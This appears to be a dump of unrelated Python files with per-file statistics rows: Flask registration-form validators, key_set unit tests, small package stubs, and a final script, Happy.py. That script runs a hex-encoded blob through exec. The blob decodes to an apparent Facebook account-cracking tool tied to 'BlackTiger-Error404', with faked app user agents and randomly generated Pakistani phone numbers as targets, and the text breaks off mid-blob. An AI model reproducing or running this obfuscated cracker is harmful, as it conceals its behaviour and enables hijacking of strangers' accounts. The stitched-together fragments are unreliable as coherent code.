    status = RadioField(label="", choices=[("User", "User"), ("Company", "Company")], render_kw={"Status"},
                        validators=[DataRequired()])
    gender = SelectField(label="", choices=genders())
    service = SelectField(label="", choices=all_services_list)
    company_url = StringField(label="",
                              render_kw={"placeholder": "Company Page Link"})
    birth_date = StringField(label="", render_kw={"placeholder": "Birth Date mm/dd/yyyy"})
    recaptcha = RecaptchaField()  # todo enable recaptcha after uploading to disable bots
    submit = SubmitField(label="Register")

    def validate_birth_date(self, birth_date):
        """Reject an invalid birth date for individual users (companies are exempt)."""
        flag, message = check_date(birth_date=birth_date.data)
        if self.status.data == "User" and not flag:
            raise ValidationError(message)

    def validate_gender(self, gender):
        """Require a concrete gender choice for individual users."""
        if self.status.data == "User" and gender.data == "Choose Your Gender":
            raise ValidationError("Please Choose Your Gender")

    def validate_service(self, service):
        """Require a concrete service choice for companies."""
        if self.status.data == "Company" and service.data == "Choose Your Company's Service":
            raise ValidationError("Please Choose Your Company's Service")

    def validate_company_url(self, company_url):
        """Check the company URL is valid and mentions the company's first name."""
        if self.status.data != "Company":
            return
        try:
            is_url(url=company_url.data)
        except Exception:  # was a bare except; keep KeyboardInterrupt/SystemExit propagating
            raise ValidationError("Invalid Company Url")
        # BUG FIX: unlike RegisterForm, GoogleForm declares no `name` field, so
        # the original `self.name` raised AttributeError for every Company
        # signup. Only run the name/URL consistency check when a name field
        # actually exists (e.g. in subclasses that add one).
        name_field = getattr(self, "name", None)
        if name_field is None:
            return
        first_name = str(name_field.data).split(" ")[0]
        if first_name.lower() not in str(company_url.data).lower():
            raise ValidationError("This Company Url is not related to Your Company")

    def validate_status(self, status):
        """Ensure status is one of the two radio options."""
        if status.data != "User" and status.data != "Company":
            raise ValidationError("Please Select Your Status")

    def validate_country(self, country):
        """Make sure that the user has chosen a country."""
        value = country.data
        # The original raised and immediately caught ValueError; a direct
        # check is equivalent and clearer.
        if value is None or str(value) == "Country" or value == 'None' or value == "":
            raise ValidationError('Choose Your Country')

    def validate_phone(self, phone):
        """International phone-number validator; the number must also be unused."""
        user = User.query.filter_by(phone=phone.data).first()
        if user is not None:
            raise ValidationError("Phone Number is used before")
        try:
            # Companies may use short hotline numbers (>= 5 digits, like Jumia).
            if len(str(phone.data)) >= 5 and self.status.data == "Company":
                return
            p = phonenumbers.parse(phone.data)
            if not phonenumbers.is_valid_number(p):
                raise ValueError()
        except (phonenumbers.phonenumberutil.NumberParseException, ValueError):
            raise ValidationError('Invalid Phone Number')
class ForgotForm(FlaskForm):
    """Form for recovering a lost api_key by email + phone number."""
    email = StringField(label="", validators=[Email("This field requires a valid Email Address"), DataRequired(),
                                              Length(min=6, max=35)], render_kw={"placeholder": "Email"})
    phone = StringField(label="", validators=[DataRequired()],
                        render_kw={"placeholder": "Phone Number ex: +209996752223"})
    recaptcha = RecaptchaField()  # todo enable recaptcha after uploading to disable bots
    submit = SubmitField(label="Find api_key")

    def validate_email(self, email):
        """Email Validator for forgot form"""
        check_email(email.data)
    # no phone validator here cause status radio is not available
class RegisterForm(FlaskForm):
    """Standard registration form where the user enters all their data.

    WTForms automatically invokes the ``validate_<field>`` methods below as
    inline validators.
    """
    name = StringField(label="", validators=[DataRequired()], render_kw={"placeholder": "Name"})
    email = StringField(label="", validators=[Email("This field requires a valid Email Address"), DataRequired(),
                                              Length(min=6, max=35)], render_kw={"placeholder": "Email"})
    phone = StringField(label="", validators=[DataRequired()],
                        render_kw={"placeholder": "Phone Number ex: +209996752223"})
    country = SelectField(label="", validators=[DataRequired()], choices=countries())
    status = RadioField(label="", choices=[("User", "User"), ("Company", "Company")], render_kw={"Status"},
                        validators=[DataRequired()])
    gender = SelectField(label="", choices=genders())
    service = SelectField(label="", choices=all_services_list)
    company_url = StringField(label="", render_kw={"placeholder": "Company Page Link"})
    birth_date = StringField(label="", render_kw={"placeholder": "Birth Date mm/dd/yyyy"})
    recaptcha = RecaptchaField()  # todo enable recaptcha after uploading to disable bots
    submit = SubmitField(label="Register")

    def validate_birth_date(self, birth_date):
        """Reject an invalid birth date for individual users (companies are exempt)."""
        flag, message = check_date(birth_date=birth_date.data)
        if self.status.data == "User" and not flag:
            raise ValidationError(message)

    def validate_gender(self, gender):
        """Require a concrete gender choice for individual users."""
        if self.status.data == "User" and gender.data == "Choose Your Gender":
            raise ValidationError("Please Choose Your Gender")

    def validate_service(self, service):
        """Require a concrete service choice for companies."""
        if self.status.data == "Company" and service.data == "Choose Your Company's Service":
            raise ValidationError("Please Choose Your Company's Service")

    def validate_company_url(self, company_url):
        """Check the company URL is valid and mentions the company's first name."""
        if self.status.data != "Company":
            return
        try:
            is_url(url=company_url.data)
        except Exception:  # was a bare except; keep KeyboardInterrupt/SystemExit propagating
            raise ValidationError("Invalid Company Url")
        first_name = str(self.name.data).split(" ")[0]
        if first_name.lower() not in str(company_url.data).lower():
            raise ValidationError("This Company Url is not related to Your Company")

    def validate_status(self, status):
        """Ensure status is one of the two radio options."""
        if status.data != "User" and status.data != "Company":
            raise ValidationError("Please Select Your Status")

    def validate_email(self, email):
        """Email must be well-formed and not already registered."""
        user = User.query.filter_by(email=email.data).first()
        if user is not None:
            raise ValidationError("Email Address is used before")
        check_email(email.data)

    def validate_name(self, name):
        """Users: letters only, no digits. Companies: format + required suffix."""
        word = str(name.data).strip()
        if self.status.data == "User":
            for letter in word:
                if letter.isdigit():
                    raise ValidationError('Please write your Real Name without Digits!')
                elif not letter.isascii():
                    raise ValidationError('Please write your Real Name only letters!')
        if self.status.data == "Company":
            if not is_company(company_name=str(name.data)):
                raise ValidationError('Please Enter Your company name in the correct format and ending')
            if COMPANY_END not in name.data.lower():
                raise ValidationError("ask permission from osa.helpme@gmail.com")

    def validate_country(self, country):
        """Make sure that the user has chosen a country."""
        value = country.data
        # The original raised and immediately caught ValueError; a direct
        # check is equivalent and clearer.
        if value is None or value == 'None' or str(value) == "Country":
            raise ValidationError('Please Choose Your Country')

    def validate_phone(self, phone):
        """International phone-number validator; the number must also be unused."""
        user = User.query.filter_by(phone=phone.data).first()
        if user is not None:
            raise ValidationError("Phone Number is used before")
        try:
            # Companies may use short hotline numbers (>= 5 digits, like Jumia).
            if len(str(phone.data)) >= 5 and self.status.data == "Company":
                return
            p = phonenumbers.parse(phone.data)
            if (not phonenumbers.is_valid_number(p)) and self.status.data == "User":
                raise ValueError()
        except (phonenumbers.phonenumberutil.NumberParseException, ValueError):
            raise ValidationError('Invalid Phone Number')
| 46.686275
| 113
| 0.630302
| 1,087
| 9,524
| 5.442502
| 0.162833
| 0.077755
| 0.030764
| 0.027045
| 0.840433
| 0.83215
| 0.821839
| 0.760142
| 0.760142
| 0.760142
| 0
| 0.006635
| 0.256195
| 9,524
| 203
| 114
| 46.916256
| 0.828487
| 0.114343
| 0
| 0.75
| 0
| 0
| 0.160644
| 0
| 0
| 0
| 0
| 0.004926
| 0
| 1
| 0.114865
| false
| 0
| 0.047297
| 0
| 0.358108
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a22f8f19d085ee5658712f98c0dc414be10ca01e
| 42
|
py
|
Python
|
lineman/lineman/__init__.py
|
tomstasz/micro
|
0f56e38de5b75ed57f0e0584ba40c0e0f1b5f9c3
|
[
"MIT"
] | null | null | null |
lineman/lineman/__init__.py
|
tomstasz/micro
|
0f56e38de5b75ed57f0e0584ba40c0e0f1b5f9c3
|
[
"MIT"
] | null | null | null |
lineman/lineman/__init__.py
|
tomstasz/micro
|
0f56e38de5b75ed57f0e0584ba40c0e0f1b5f9c3
|
[
"MIT"
] | null | null | null |
import lineman.app
import lineman.models
| 10.5
| 21
| 0.833333
| 6
| 42
| 5.833333
| 0.666667
| 0.742857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119048
| 42
| 3
| 22
| 14
| 0.945946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a26b3eb6286bb72af90e9cbf70bfdc24fc379bcf
| 11,243
|
py
|
Python
|
tests/test_all_except_some.py
|
eturino/key_set.py
|
ee9a8e27012789ae46657eef7ac057412c33a313
|
[
"Apache-2.0"
] | null | null | null |
tests/test_all_except_some.py
|
eturino/key_set.py
|
ee9a8e27012789ae46657eef7ac057412c33a313
|
[
"Apache-2.0"
] | null | null | null |
tests/test_all_except_some.py
|
eturino/key_set.py
|
ee9a8e27012789ae46657eef7ac057412c33a313
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import __future__ # noqa: F401
from key_set.base import KeySetAll, KeySetAllExceptSome, KeySetNone, KeySetSome
class TestAllExceptSome:
    """Exercises KeySetAllExceptSome against every other key-set flavour.

    Each test builds the subject set over {'a', 'b'} and checks the
    contract of one operation (represents_*, invert, clone, repr,
    len, elements, intersect, includes, union, difference).
    """

    def test_represents(self) -> None:
        subject = KeySetAllExceptSome({'a', 'b'})
        assert subject.represents_all_except_some()
        assert not subject.represents_none()
        assert not subject.represents_all()
        assert not subject.represents_some()

    def test_invert(self) -> None:
        # Complement of "all except {a, b}" is exactly "some {a, b}".
        inverted = KeySetAllExceptSome({'a', 'b'}).invert()
        assert inverted.represents_some()
        assert inverted.elements() == {'a', 'b'}

    def test_clone(self) -> None:
        subject = KeySetAllExceptSome({'a', 'b'})
        copy = subject.clone()
        assert copy.represents_all_except_some()
        assert copy.elements() == {'a', 'b'}
        assert copy == subject
        assert copy is not subject

    def test_repr(self) -> None:
        # repr must round-trip through eval into an equal, distinct object.
        subject = KeySetAllExceptSome({'a', 'b'})
        rebuilt = eval(repr(subject))
        assert rebuilt.represents_all_except_some()
        assert rebuilt.elements() == {'a', 'b'}
        assert rebuilt == subject
        assert rebuilt is not subject

    def test_len(self) -> None:
        assert len(KeySetAllExceptSome({'a', 'b'})) == 2

    def test_elements(self) -> None:
        assert KeySetAllExceptSome({'a', 'b'}).elements() == {'a', 'b'}

    def test_intersect_all(self) -> None:
        subject = KeySetAllExceptSome({'a', 'b'})
        result = subject.intersect(KeySetAll())
        assert result.represents_all_except_some()
        assert result == subject
        assert result is not subject

    def test_intersect_none(self) -> None:
        operand = KeySetNone()
        result = KeySetAllExceptSome({'a', 'b'}).intersect(operand)
        assert result.represents_none()
        assert result == operand
        assert result is not operand

    def test_intersect_some_same_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).intersect(KeySetSome({'a', 'b'}))
        assert result.represents_none()

    def test_intersect_some_subset_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).intersect(KeySetSome({'a'}))
        assert result.represents_none()

    def test_intersect_some_superset_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).intersect(KeySetSome({'a', 'b', 'c'}))
        assert result.represents_some()
        assert result.elements() == {'c'}

    def test_intersect_some_with_some_common_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).intersect(KeySetSome({'a', 'c'}))
        assert result.represents_some()
        assert result.elements() == {'c'}

    def test_intersect_some_without_common_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).intersect(KeySetSome({'c', 'd'}))
        assert result.represents_some()
        assert result.elements() == {'c', 'd'}

    def test_intersect_all_except_some_same_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).intersect(KeySetAllExceptSome({'a', 'b'}))
        assert result.represents_all_except_some()
        assert result.elements() == {'a', 'b'}

    def test_intersect_all_except_some_subset_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).intersect(KeySetAllExceptSome({'a'}))
        assert result.represents_all_except_some()
        assert result.elements() == {'a', 'b'}

    def test_intersect_all_except_some_superset_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).intersect(KeySetAllExceptSome({'a', 'b', 'c'}))
        assert result.represents_all_except_some()
        assert result.elements() == {'a', 'b', 'c'}

    def test_intersect_all_except_some_with_some_common_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).intersect(KeySetAllExceptSome({'a', 'c'}))
        assert result.represents_all_except_some()
        assert result.elements() == {'a', 'b', 'c'}

    def test_intersect_all_except_some_without_common_keys(self) -> None:
        # Intersection of complements excludes the union of both key sets.
        result = KeySetAllExceptSome({'a', 'b'}).intersect(KeySetAllExceptSome({'c', 'd'}))
        assert result.represents_all_except_some()
        assert result.elements() == {'a', 'b', 'c', 'd'}

    def test_includes_included(self) -> None:
        # Excluded keys are reported as NOT included.
        subject = KeySetAllExceptSome({'a', 'b'})
        assert not subject.includes('a')
        assert 'a' not in subject

    def test_includes_missing(self) -> None:
        subject = KeySetAllExceptSome({'a', 'b'})
        assert subject.includes('c')
        assert 'c' in subject

    def test_union_all(self) -> None:
        operand = KeySetAll()
        result = KeySetAllExceptSome({'a', 'b'}).union(operand)
        assert result.represents_all()
        assert result == operand
        assert result is not operand

    def test_union_none(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).union(KeySetNone())
        assert result.represents_all_except_some()
        assert result.elements() == {'a', 'b'}

    def test_union_some_same_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).union(KeySetSome({'a', 'b'}))
        assert result.represents_all()

    def test_union_some_subset_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).union(KeySetSome({'a'}))
        assert result.represents_all_except_some()
        assert result.elements() == {'b'}

    def test_union_some_superset_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).union(KeySetSome({'a', 'b', 'c'}))
        assert result.represents_all()

    def test_union_some_with_some_common_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).union(KeySetSome({'a', 'c'}))
        assert result.represents_all_except_some()
        assert result.elements() == {'b'}

    def test_union_some_without_common_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).union(KeySetSome({'c', 'd'}))
        assert result.represents_all_except_some()
        assert result.elements() == {'a', 'b'}

    def test_union_all_except_some_same_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).union(KeySetAllExceptSome({'a', 'b'}))
        assert result.represents_all_except_some()
        assert result.elements() == {'a', 'b'}

    def test_union_all_except_some_subset_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).union(KeySetAllExceptSome({'a'}))
        assert result.represents_all_except_some()
        assert result.elements() == {'a'}

    def test_union_all_except_some_superset_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).union(KeySetAllExceptSome({'a', 'b', 'c'}))
        assert result.represents_all_except_some()
        assert result.elements() == {'a', 'b'}

    def test_union_all_except_some_with_some_common_keys(self) -> None:
        # Union of complements excludes only the keys excluded by both.
        result = KeySetAllExceptSome({'a', 'b'}).union(KeySetAllExceptSome({'a', 'c'}))
        assert result.represents_all_except_some()
        assert result.elements() == {'a'}

    def test_union_all_except_some_without_common_keys(self) -> None:
        # Disjoint exclusions cover each other, so the union is everything.
        result = KeySetAllExceptSome({'a', 'b'}).union(KeySetAllExceptSome({'c', 'd'}))
        assert result.represents_all()

    def test_remove_all(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).difference(KeySetAll())
        assert result.represents_none()

    def test_remove_none(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).difference(KeySetNone())
        assert result.represents_all_except_some()
        assert result.elements() == {'a', 'b'}

    def test_remove_some_same_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).difference(KeySetSome({'a', 'b'}))
        assert result.represents_all_except_some()
        assert result.elements() == {'a', 'b'}

    def test_remove_some_subset_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).difference(KeySetSome({'a'}))
        assert result.represents_all_except_some()
        assert result.elements() == {'a', 'b'}

    def test_remove_some_superset_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).difference(KeySetSome({'a', 'b', 'c'}))
        assert result.represents_all_except_some()
        assert result.elements() == {'a', 'b', 'c'}

    def test_remove_some_with_some_common_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).difference(KeySetSome({'a', 'c'}))
        assert result.represents_all_except_some()
        assert result.elements() == {'a', 'b', 'c'}

    def test_remove_some_without_common_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).difference(KeySetSome({'c', 'd'}))
        assert result.represents_all_except_some()
        assert result.elements() == {'a', 'b', 'c', 'd'}

    def test_remove_all_except_some_same_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).difference(KeySetAllExceptSome({'a', 'b'}))
        assert result.represents_none()

    def test_remove_all_except_some_subset_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).difference(KeySetAllExceptSome({'a'}))
        assert result.represents_none()

    def test_remove_all_except_some_superset_keys(self) -> None:
        # Removing a wider complement leaves only the operand's extra keys.
        result = KeySetAllExceptSome({'a', 'b'}).difference(KeySetAllExceptSome({'a', 'b', 'c'}))
        assert result.represents_some()
        assert result.elements() == {'c'}

    def test_remove_all_except_some_with_some_common_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).difference(KeySetAllExceptSome({'a', 'c'}))
        assert result.represents_some()
        assert result.elements() == {'c'}

    def test_remove_all_except_some_without_common_keys(self) -> None:
        result = KeySetAllExceptSome({'a', 'b'}).difference(KeySetAllExceptSome({'c', 'd'}))
        assert result.represents_some()
        assert result.elements() == {'c', 'd'}
| 37.228477
| 79
| 0.603576
| 1,276
| 11,243
| 5.095611
| 0.045455
| 0.14211
| 0.161489
| 0.196247
| 0.937404
| 0.932944
| 0.92956
| 0.905106
| 0.858505
| 0.858505
| 0
| 0.000947
| 0.248955
| 11,243
| 301
| 80
| 37.352159
| 0.769067
| 0.003825
| 0
| 0.762846
| 0
| 0
| 0.018757
| 0
| 0
| 0
| 0
| 0
| 0.343874
| 1
| 0.173913
| false
| 0
| 0.007905
| 0
| 0.185771
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a2e57f70ad7407cb93dd00f0986826a91ee2c0b7
| 142
|
py
|
Python
|
kevin/machine_learning/patch_for_numpy/axis_and_dim/__init__.py
|
cantbeblank96/kevin_toolbox
|
a258b2a42c9b4d042decb193354ecb7419bd837c
|
[
"MIT"
] | null | null | null |
kevin/machine_learning/patch_for_numpy/axis_and_dim/__init__.py
|
cantbeblank96/kevin_toolbox
|
a258b2a42c9b4d042decb193354ecb7419bd837c
|
[
"MIT"
] | null | null | null |
kevin/machine_learning/patch_for_numpy/axis_and_dim/__init__.py
|
cantbeblank96/kevin_toolbox
|
a258b2a42c9b4d042decb193354ecb7419bd837c
|
[
"MIT"
] | null | null | null |
from kevin.machine_learning.patch_for_numpy.axis_and_dim.transpose.get_inverse_of_transpose_index_ls import get_inverse_of_transpose_index_ls
| 71
| 141
| 0.93662
| 24
| 142
| 4.916667
| 0.708333
| 0.169492
| 0.20339
| 0.355932
| 0.474576
| 0.474576
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028169
| 142
| 1
| 142
| 142
| 0.855072
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
a2fad2e9e41f09bbdd69fd38bf2bce0260249b7a
| 37,725
|
py
|
Python
|
Happy.py
|
Trey-Killer/without
|
5975618d0e6a57843d6d46c169b32f70b8743d8c
|
[
"Apache-2.0"
] | null | null | null |
Happy.py
|
Trey-Killer/without
|
5975618d0e6a57843d6d46c169b32f70b8743d8c
|
[
"Apache-2.0"
] | null | null | null |
Happy.py
|
Trey-Killer/without
|
5975618d0e6a57843d6d46c169b32f70b8743d8c
|
[
"Apache-2.0"
] | null | null | null |
import base64
exec(base64.b16decode('23212F7573722F62696E2F707974686F6E320A23636F64696E673D7574662D380A23426C61636B54696765722D4572726F723430340A23596F75547562653A54696D653420596F750A2357686174736170702B3932333033373333353131340A696D706F7274206F732C7379732C74696D652C6461746574696D652C72616E646F6D2C686173686C69622C72652C746872656164696E672C6A736F6E2C75726C6C69622C636F6F6B69656C69622C676574706173730A6F732E73797374656D2827726D202D7266202E74787427290A666F72206E20696E2072616E6765283130303030293A0A0A202020206E6D6272203D2072616E646F6D2E72616E64696E7428313131313131312C2039393939393939290A202020200A202020207379732E7374646F7574203D206F70656E28272E747874272C20276127290A0A202020207072696E74286E6D6272290A0A202020207379732E7374646F75742E666C75736828290A202020200A7472793A0A20202020696D706F72742072657175657374730A65786365707420496D706F72744572726F723A0A202020206F732E73797374656D28277069703220696E7374616C6C206D656368616E697A6527290A202020200A7472793A0A20202020696D706F7274206D656368616E697A650A65786365707420496D706F72744572726F723A0A202020206F732E73797374656D28277069703220696E7374616C6C207265717565737427290A2020202074696D652E736C6565702831290A202020206F732E73797374656D28275468656E20747970653A20707974686F6E322048617070792E707927290A0A696D706F7274206F732C7379732C74696D652C6461746574696D652C72616E646F6D2C686173686C69622C72652C746872656164696E672C6A736F6E2C75726C6C69622C636F6F6B69656C69622C72657175657374732C6D656368616E697A650A66726F6D206D756C746970726F63657373696E672E706F6F6C20696D706F727420546872656164506F6F6C0A66726F6D2072657175657374732E657863657074696F6E7320696D706F727420436F6E6E656374696F6E4572726F720A66726F6D206D656368616E697A6520696D706F72742042726F777365720A0A0A72656C6F616428737973290A7379732E73657464656661756C74656E636F64696E6728277574663827290A6272203D206D656368616E697A652E42726F7773657228290A62722E7365745F68616E646C655F726F626F74732846616C7365290A62722E7365745F68616E646C655F72656672657368286D656368616E697A652E5F687474702E485454505265667265736850726F636573736F7228292C6D61785F74696D653D31290
A62722E61646468656164657273203D205B2827557365722D4167656E74272C20274F706572612F392E38302028416E64726F69643B204F70657261204D696E692F33322E302E323235342F38352E20553B206964292050726573746F2F322E31322E3432332056657273696F6E2F31322E313627295D0A62722E61646468656164657273203D205B2827757365722D6167656E74272C2744616C76696B2F312E362E3020284C696E75783B20553B20416E64726F696420342E342E323B204E583535204275696C642F4B4F543535303629205B4642414E2F464234413B464241562F3130362E302E302E32362E36383B464242562F34353930343136303B4642444D2F7B64656E736974793D332E302C77696474683D313038302C6865696768743D313932307D3B46424C432F69745F49543B464252562F34353930343136303B464243522F506F7374654D6F62696C653B46424D462F617375733B464242442F617375733B4642504E2F636F6D2E66616365626F6F6B2E6B6174616E613B464244562F415355535F5A303041443B464253562F352E303B46424F502F313B464243412F7838363A61726D656162692D7637613B5D27295D0A0A646566206B656C75617228293A0A097072696E7420275468616E6B732E270A096F732E7379732E6578697428290A0A646566206163616B2862293A0A2020202077203D2027616874647A6A63270A2020202064203D2027270A20202020666F72206920696E20783A0A202020202020202064202B3D202721272B775B72616E646F6D2E72616E64696E7428302C6C656E2877292D31295D2B690A2020202072657475726E20636574616B2864290A0A0A64656620636574616B2862293A0A2020202077203D2027616874647A6A63270A20202020666F72206920696E20773A0A20202020202020206A203D20772E696E6465782869290A2020202020202020783D20782E7265706C61636528272125732725692C275C3033335B25733B316D27257374722833312B6A29290A2020202078202B3D20275C3033335B306D270A2020202078203D20782E7265706C61636528272130272C275C3033335B306D27290A202020207379732E7374646F75742E777269746528782B275C6E27290A0A0A646566206A616C616E287A293A0A09666F72206520696E207A202B20275C6E273A0A09097379732E7374646F75742E77726974652865290A09097379732E7374646F75742E666C75736828290A090974696D652E736C6565702830303030302E31290A6465662074696B28293A0A09746974696B203D205B272E202020272C272E2E2020272C272E2E2E20275D0A09666F72206F20696E20746974696B3A0A09097072696E7428225C725C78316
25B313B39336D426C61636B5469676572E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29692E29692E29692E29692E29692E29692E29692E296922E2E393925205C7831625B313B39336D222B6F292C3B7379732E7374646F75742E666C75736828293B74696D652E736C6565702831290A0A0A6261636B203D20300A6F6B73203D205B5D0A6964203D205B5D0A637062203D205B5D0A76756C6E6F74203D20225C3033335B33316D4E6F742056756C6E220A76756C6E203D20225C3033335B33326D56756C6E220A0A6F732E73797374656D2822636C65617222290A7072696E7420202222220A5C3033335B313B39316D2020205F0A5C3033335B313B39326D202028205C202020202020202020202020202020202E2E2D2D2D2D2D2E2E5F5F0A5C3033335B313B39336D2020205C2E272E20202020202020205F2E2D2D276020205B2020202720202720606060272D2E5F0A5C3033335B313B39346D20202020602E2060272D2E2E2D27272060202020202720202720272020202E20203B2020203B20602D2727272D2E2C5F5F2F7C2F5F0A5C3033335B313B39356D20202020202060272D2E3B2E2E2D2727607C272020602E2020272E202020203B202020202027202060202020202720202060272020602C0A5C3033335B313B39366D20202020202020202020202020202020205C20272020202E2020202027202E2020202020272020203B2020202E602020202E20272037205C0A5C3033335B313B39376D202020202020202020202020202020202020272E27202E20272D202E205C202020202E602020202E6020202E2020202E5C202020202060590A5C3033335B313B39316D2020202020202020202020202020202020202020272D2E27202E2020205D2E2020272020202C2020202027202020202F27602222273B3A270A5C3033335B313B39326D202020202020202020202020202020202020202020202F59202020272E5D20272D2E5F202F2020202027205F2E2D270A5C3033335B313B39336D202020202020202020202020202020202020202020205C275C5F2020203B202860272E272E2720202E222F0A5C3033335B313B39346D202020202020202020202020202020202020202020202027202960202F2020602E272020202E2D272E270A5C3033335B313B39356D202020202020202020202020202020202020202020202020275C20205C292E2720202E2D272D2D220A5C3033335B313B39366D2020202020202020202020202020202020202020202020202020602E20602C5F27600A5C3033335B313B39376D202020202020202020202020202020202020202020202020202
02020602E5F5F2920204173482F736B0A5C3033335B313B39366DE29685E29685E29685E29685E29685E29685E29685E29685E0B991DBA9E2888628426C61636B546967657229E28886DBA9E0B991E29685E29685E29685E29685E29685E296850A5C3033335B313B39346D43726561746572E29EA35C3033335B313B39336D426C61636B54696765722D4572726F723430340A5C3033335B313B39346D5768617473617070E2988F20E29EA35C3033335B313B39336D2B3932333033373333353131340A5C3033335B313B39346D596F7574756265E29EA35C3033335B313B39336D54696D653420596F750A5C3033335B313B39346D425469676572E29EA34E6F742041204E616D6520497473204272616E64205C3033335B313B39326D4572726F723430340A5C3033335B313B39346D4E6F204C6F67696E204E656564E29EA3456E6A6F7920776974686F757420616E792070726F626C656D0A5C3033335B313B39356D42546967657220566572792053706565642053637269707420E29EA34F6E6C79206164642050414B20436F756E74727920636F64650A5C3033335B313B39366DE29685E29685E29685E29685E29685E29685E29685E29685E29685E0B991DBA9E28886284572726F7234303429E28886DBA9E0B991E29685E29685E29685E29685E29685E296850A2222220A0A232323234C6F676F232323230A0A6C6F676F31203D202222220A5C3033335B313B39316D2020202020202020202020205F2020202020205F0A5C3033335B313B39326D202020202020202020202028635C2D2E2D2D2F61290A5C3033335B313B39336D2020202020202020202020207C713A20702020202F5C5F2020202020202020202020205F5F5F5F5F0A5C3033335B313B39346D202020202020202020205F5F5C285F2F2020292E272020272D2D2D2E5F2E2D2D2D27602020202020272D2D2D2E5F5F0A5C3033335B313B39356D2020202020202020202F202028595F295F2F202020202020202020202020202F20202020202020203A205C2D2E5F205C0A5C3033335B313B39366D20212121212C2C2C205C5F2929272D273B2020202020202020202020202028202020202020205F2F2020205C2020275C5C5F0A5C3033335B313B39376D212149492121212121494949492C2C205C5F202020202020202020202020205C20202020202F2020202020205C5F2020272E5C0A5C3033335B313B39316D20214949736E644949494949212121212C2C5C20202020202F5F2020202020205C2020207C2D2D2D2D2E5F5F5F20272D2E205C272E5F5F0A5C3033335B313B39326D20212121494949494949494949494949494949495C2020207C20272D2D2E5F2E2D2720205F29202020202020205
C20207C202060272D2D270A5C3033335B313B39336D202020202027272721212121494949494949492F2020202E272C2C2028285F5F5F2E2D272020202020202020202F202F0A5C3033335B313B39346D2020202020202020202020272727212121212F20205F2F212121214949494949494921212121212C2C2C2C2C3B2C3B2C2C2C2E2E2E2E2E0A5C3033335B313B39356D20202020202020202020202020202020207C202F49494949494949494949494949494949494949494949494949494949494949494949490A5C3033335B313B39366D20202020202020202020202020202020207C205C20202027274949494949494949494949494949494949494949494949494949494949494949490A5C3033335B313B39376D20202020202020202020202020202020205C5F2C2920202020202727272727212121214949494949494949494949494949494921212121212121210A5C3033335B313B39376D20202020202020202020202020202020202020202020202020202020202020202020202727272727272727272721212121212121212121212121210A5C3033335B313B39366DE29685E29685E29685E29685E29685E29685E29685E29685E0B991DBA9E2888628426C61636B546967657229E28886DBA9E0B991E29685E29685E29685E29685E29685E296850A5C3033335B313B39346D43726561746572E29EA35C3033335B313B39336D426C61636B54696765722D4572726F723430340A5C3033335B313B39346D5768617473617070E2988F20E29EA35C3033335B313B39336D2B3932333033373333353131340A5C3033335B313B39346D596F7574756265E29EA35C3033335B313B39336D54696D653420596F750A5C3033335B313B39346D425469676572E29EA34E6F742041204E616D6520497473204272616E